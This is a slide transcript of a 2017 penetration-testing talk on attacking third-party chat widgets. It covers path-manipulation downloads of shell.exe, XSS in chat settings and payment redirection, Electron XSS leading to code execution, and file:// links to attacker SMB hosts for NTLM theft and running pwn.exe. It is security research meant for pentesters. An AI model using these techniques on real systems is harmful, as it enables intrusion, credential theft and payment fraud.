Chat with a hacker

20a280fca034a72b4918a2b824b34033?s=47 E K
November 21, 2017

Chat with a hacker

Talk about 3rd party application. How they can help us in pentest?
Topics:
- RCE from file upload
- JavaScript implementation and privileges
- Sad consequence via simple XSS
- Desktop applications (Electron XSS == RCE)
- RCE via scheme file:// and tricks
- A few words about mobile applications, 3rd party SDK and malware

20a280fca034a72b4918a2b824b34033?s=128

E K

November 21, 2017
Tweet

Transcript

  1. 1.

    Chat with a hacker Increase attack surface for Pentest A

    talk by Egor Karbutov and Alexey Pertsev
  2. 2.

    • Egor Karbutov & Alexey Pertsev • Penetration testers @Digital

    Security • Speakers • Bug Hunters $ Whoarewe
 2
  3. 3.

    • Chats-Chats-Chats • How does it works? • ZIP old

    tricks • RCE via ZIP • So much XSS • Electron vulnerability • Scheme file:// for your chats • Payment through chats • Mobile Application Chats Agenda 3
  4. 7.
  5. 9.

    • Increase attack surface • Social engineering attacks • Vulnerability

    of own implementations • Vendors vulnerability • User support is on the local network • Lack of segmentation (network) Does it help us? Pentest! 9
  6. 11.

    • XML HTTP Request • Control of user data •

    Cookie • Tokens • Sensitive information • HTML replace • Remote update JavaScript «Privileges» 11
  7. 15.

    • Social engineering attacks? • Will you send an EXE

    files? • We can use a couple of stupid tricks with ZIP Files 13
  8. 16.

    42 Kb ZIP Bomb 24 Gb? 322 Gb? 132 Tb?

    4.5 Pb Hi @sergeybelove from 2014 :) 14
  9. 21.

    Let’s send a file storage.servise.test api.servise.test Sending the file cat.png

    cat.png == id User interface Operator standalone program 17
  10. 22.

    Let’s send a file storage.servise.test api.servise.test Sending the file cat.png

    cat.png == id User interface Operator standalone program File Message
 file_path= “/file/id” 17
  11. 23.

    Let’s send a file storage.servise.test api.servise.test File Message
 file_path= “/file/id”

    Sending the file cat.png cat.png == id User interface Operator standalone program File Message
 file_path= “/file/id” 17
  12. 24.

    Let’s send a file storage.servise.test api.servise.test File Message
 file_path= “/file/id”

    Concat(‘https://storage.service.test', file_path); Sending the file cat.png cat.png == id User interface Operator standalone program File Message
 file_path= “/file/id” 17
  13. 25.

    Let’s send a file storage.servise.test api.servise.test File Message
 file_path= “/file/id”

    Concat(‘https://storage.service.test', file_path); Download file GET /file/id HTTP/1.1 Host: storage.service.test Sending the file cat.png cat.png == id User interface Operator standalone program File Message
 file_path= “/file/id” 17
  14. 26.

    Let’s send a file storage.servise.test api.servise.test File Message
 file_path= “/file/id”

    Concat(‘https://storage.service.test', file_path); Download file GET /file/id HTTP/1.1 Host: storage.service.test %Downloads%/cat.png Sending the file cat.png cat.png == id User interface Operator standalone program File Message
 file_path= “/file/id” 17
  15. 29.

    RCE via File api.servise.test Sending the file cat.png File Message


    file_path = 
 “.hacker.site/file/id” User interface Operator standalone program 18
  16. 30.

    RCE via File api.servise.test File Message
 file_path =
 “.hacker.test/file/id” Sending

    the file cat.png File Message
 file_path = 
 “.hacker.site/file/id” User interface Operator standalone program 18
  17. 31.

    RCE via File api.servise.test File Message
 file_path =
 “.hacker.test/file/id” Concat(‘https://storage.service.test',

    file_path); Sending the file cat.png File Message
 file_path = 
 “.hacker.site/file/id” User interface Operator standalone program 18
  18. 32.

    RCE via File storage.servise.test.hacke.site api.servise.test File Message
 file_path =
 “.hacker.test/file/id”

    Concat(‘https://storage.service.test', file_path); Sending the file cat.png File Message
 file_path = 
 “.hacker.site/file/id” User interface Operator standalone program 18
  19. 33.

    RCE via File storage.servise.test.hacke.site api.servise.test File Message
 file_path =
 “.hacker.test/file/id”

    Concat(‘https://storage.service.test', file_path); Sending the file cat.png File Message
 file_path = 
 “.hacker.site/file/id” User interface Operator standalone program ../../../../../../../shell.exe == id 18
  20. 34.

    RCE via File storage.servise.test.hacke.site api.servise.test File Message
 file_path =
 “.hacker.test/file/id”

    Concat(‘https://storage.service.test', file_path); Download file GET /file/id HTTP/1.1 Host: storage.service.test.hacke.site Sending the file cat.png File Message
 file_path = 
 “.hacker.site/file/id” User interface Operator standalone program ../../../../../../../shell.exe == id 18
  21. 35.

    RCE via File storage.servise.test.hacke.site api.servise.test File Message
 file_path =
 “.hacker.test/file/id”

    Concat(‘https://storage.service.test', file_path); Download file GET /file/id HTTP/1.1 Host: storage.service.test.hacke.site %Downloads%/shell.exe Sending the file cat.png File Message
 file_path = 
 “.hacker.site/file/id” User interface Operator standalone program ../../../../../../../shell.exe == id 18
  22. 36.

    • XSS is the maximum impact • High level of

    message security • Not obvious places • Headers • GET/POST parameters for analytics • Our target is Admin page or statistic page XSS 19
  23. 38.

    • Methods • GET • POST • WebSocket Parameters for

    XSS 21 Keep it simple. Use gray box analysis!
  24. 39.

    • Waiting for someone to visit this page • Abuse

    of complaints against administrators Admin & Statistic Page 22
  25. 40.

    The sad consequences • XSS into chat settings • Appearance

    customisation • Fonts • Labels • Color • Image • etc 23
  26. 43.

    Attack scheme №1 XSS attack on chat pentest_client.shop.test Evil Hacker

    statistic_vendor.chat.test admin_vendor.chat.test 24
  27. 44.

    Attack scheme №1 XSS attack on chat pentest_client.shop.test Evil Hacker

    XSS attack on client admins statistic_vendor.chat.test admin_vendor.chat.test 24
  28. 45.

    Attack scheme №1 XSS attack on chat pentest_client.shop.test Evil Hacker

    XSS attack on client admins statistic_vendor.chat.test admin_vendor.chat.test 24
  29. 46.

    Attack scheme №1 XSS attack on chat pentest_client.shop.test Evil Hacker

    XSS attack on client admins JS code injection into chat settings statistic_vendor.chat.test admin_vendor.chat.test 24
  30. 47.

    Attack scheme №1 XSS attack on chat pentest_client.shop.test Evil Hacker

    XSS attack on client admins JS code injection into chat settings XSS from any user on the site statistic_vendor.chat.test admin_vendor.chat.test 24
  31. 48.

    Attack scheme №1 XSS attack on chat pentest_client.shop.test Evil Hacker

    XSS attack on client admins JS code injection into chat settings XSS from any user on the site pentest_client.shop.test statistic_vendor.chat.test admin_vendor.chat.test 24
  32. 51.

    Attack scheme №2 XSS attack on chat Evil Hacker XSS

    attack on vendor admins statistic.chat.vendor admin.chat.vendor chat.vendor 25
  33. 52.

    Attack scheme №2 XSS attack on chat Evil Hacker XSS

    attack on vendor admins statistic.chat.vendor admin.chat.vendor chat.vendor 25
  34. 53.

    Attack scheme №2 XSS attack on chat Evil Hacker XSS

    attack on vendor admins JS code injection into chat settings statistic.chat.vendor admin.chat.vendor chat.vendor 25
  35. 54.

    Attack scheme №2 XSS attack on chat Evil Hacker XSS

    attack on vendor admins JS code injection into chat settings XSS from any user on the site statistic.chat.vendor admin.chat.vendor chat.vendor 25
  36. 55.

    Attack scheme №2 XSS attack on chat Evil Hacker XSS

    attack on vendor admins JS code injection into chat settings XSS from any user on the site statistic.chat.vendor admin.chat.vendor chat.vendor chat.vendor 25
  37. 56.

    Attack scheme №2 XSS attack on chat Evil Hacker XSS

    attack on vendor admins JS code injection into chat settings XSS from any user on the site XSS from any user on chat clients statistic.chat.vendor admin.chat.vendor chat.vendor chat.vendor 25
  38. 57.

    Attack scheme №2 XSS attack on chat Evil Hacker XSS

    attack on vendor admins JS code injection into chat settings XSS from any user on the site XSS from any user on chat clients statistic.chat.vendor admin.chat.vendor statistic_vendor.chat.test admin_vendor.chat.test chat.test All chat clients services chat.vendor chat.vendor 25
  39. 58.

    Electron • OpenSource framework to build desktop apps using HTML,

    CSS and JavaScript • Electron accomplishes this by combining Chromium and Node.js into a single runtime • Chats vendor use Electron for admin desktop applications 26
  40. 59.

    • Electron Threat Model = Browser Threat Model • Untrusted

    content from the web • SOP Bypass • Control whether access to Node.js primitives is allowed from JavaScript • Potential access to Node.js primitives • Limited sandbox • XSS == RCE Electron Threat Model https://doyensec.com/resources/us-17-Carettoni-Electronegativity-A-Study-Of-Electron-Security.pdf https://blog.doyensec.com/2017/08/03/electron-framework-security.html 27
  41. 61.

    • nodeIntegration = true • Misconfiguration • SOP bypass via

    presence of privileged URLs • Switch false Electron sandbox bypass 29
  42. 62.

    • Typically used to retrieve files from networks and local

    disks • Vulnerability in the wild • Local File Inclusion • XXE • SSRF • Windows context • NTLM Hash Stealing • NTLM Relay • RCE File:// 30
  43. 63.

    • Admin desktop application for Windows • Available scheme file://

    • Scheme file:// like hyperlink Chats with File:// 31
  44. 64.

    Chats with File:// pentest_client.shop.test Admin desktop application Send NTLM hash

    Send file:// link file://hacker.test/ Hacker SMB Hash Cracking SMB Relay • Pentest in local network • RCE on client device and servers • Weakness & duplicate passwords (local services, servers, client devices) 32
  45. 65.

    • What can we do? • File:// with local files

    • file://C:/Windows/System32/calc.exe Tricks with File:// №1 • But we can’t use arguments file://C:/Windows/System32/cmd.exe /C calc • All symbols in file link is a path • It is only for social engineering attacks • You can combine this with dir traversal ZIP trick 33
  46. 66.

    • File:// with execute files from the Internet (Hacker SMB

    server) • file://internet_IP/pwn.exe Tricks with File:// №2 34
  47. 67.

    Chats with File:// pentest_client.shop.test Admin desktop application Download shell.exe Send

    file:// link
 on execute file file://hacker.test/shell.exe Hacker SMB • Pentest internet service and local network • RCE on client device • Social engineering attacks + file://local_files Clicking on the link Admin OS Executing shell.exe 35
  48. 68.

    • How to bypass Windows alert window? • “This file

    is in a location outside your local network” • Easy, I’ll use local addresses • 10.0.0.0—10.255.255.255 • 172.16.0.0—172.31.255.255 • 192.168.0.0—192.168.255.255 • No, it isn’t work Tricks with File:// №3 36
  49. 69.

    • “Local network” from OS Windows is servers with NetBios

    name • NetBios name - Domain names without dot • If I’ll use NetBios name “netbios” instead of “local IP”, I can bypass that alert • file://netbios/pwn.exe • How? • Smbd (samba) server + responder –d netbios –I eth0 • Working only in local networks Tricks with File:// №3 37
  50. 70.

    Chats with File:// • NetBios name trick in local network

    • Without alert window pentest_client.shop.test Admin desktop application Send file:// link
 on execute file file://netbios/pwn.exe Hacker SMB Clicking on the link Admin OS Download shell.exe Executing shell.exe 38
  51. 73.

    Hacker can buy IPhone for free POST /pay?params=1 • shopId

    • customer • sum • item • … 40 Shop backend
  52. 74.

    Hacker can buy IPhone for free POST /pay?params=1 • shopId

    • customer • sum • item • … Redirect to payment page 40 Shop backend
  53. 75.

    Hacker can buy IPhone for free POST /pay?params=1 • shopId

    • customer • sum • item • … Redirect to payment page checkURL YES 40 Shop backend
  54. 76.

    Hacker can buy IPhone for free POST /pay?params=1 • shopId

    • customer • sum • item • … Redirect to payment page checkURL YES Evil Hacker 40 Shop backend
  55. 77.

    Hacker can buy IPhone for free POST /pay?params=1 • shopId

    • customer • sum • item • … Redirect to payment page checkURL YES Evil Hacker avisoURL IPhone X 40 Shop backend
  56. 78.

    Stealing money for hackers POST /pay?params=1 • shopId • customer

    • sum • item • … Steps to take profit: • Register own shop with similar name • Change shopId via XSS • Call checkURL and avisoURL as needed • All payments for hackers ! Protection: • Check Yandex Ips • Add anti-CSRF token for config form • DO NOT SHOW ANY PASSWORDS EVER 41
  57. 79.

    • Custom code for native applications • All code have

    only one privileges in Mobile OS • 3rd party applications have full access in your app • Change the user interface • Access to local files in folder app • Access to dynamic user data • Change logic app (like tapjacking) • Vulnerability • Custom implementation • WebView JS manipulation (Android) Mobile Application SDK https://labs.mwrinfosecurity.com/blog/webview-addjavascriptinterface-remote-code-execution/ 42
  58. 80.

    • ExpensiveWall is spread to different apps as an SDK

    called “gtk,” • ExpensiveWall sends data about the infected device to its C&C server, including its location and unique identifiers, such as MAC and IP addresses, IMSI, and IMEI. • Total Downloads infected applications = 5,904,511 ExpensiveWall https://blog.checkpoint.com/2017/09/14/expensivewall-dangerous-packed-malware-google-play-will-hit-wallet/ 43
  59. 81.

    • Farms that overestimate the rating of applications • Dynamic

    code execution and code update • JSPatch iOS • Android Runtime • Valid Ad that were vulnerable • Application with fake (Ad) SDK • Code review custom SDK code Don’t forget about 44
  60. 82.

    • For pentest and red team • Increase your attack

    surface via 3rd party services and program library • For you and your project • Think how much you trust other people’s implementations, applications in your devices, plugins in your program • Don’t forget about code review! • All vulnerability are reported and fixed Conclusion 45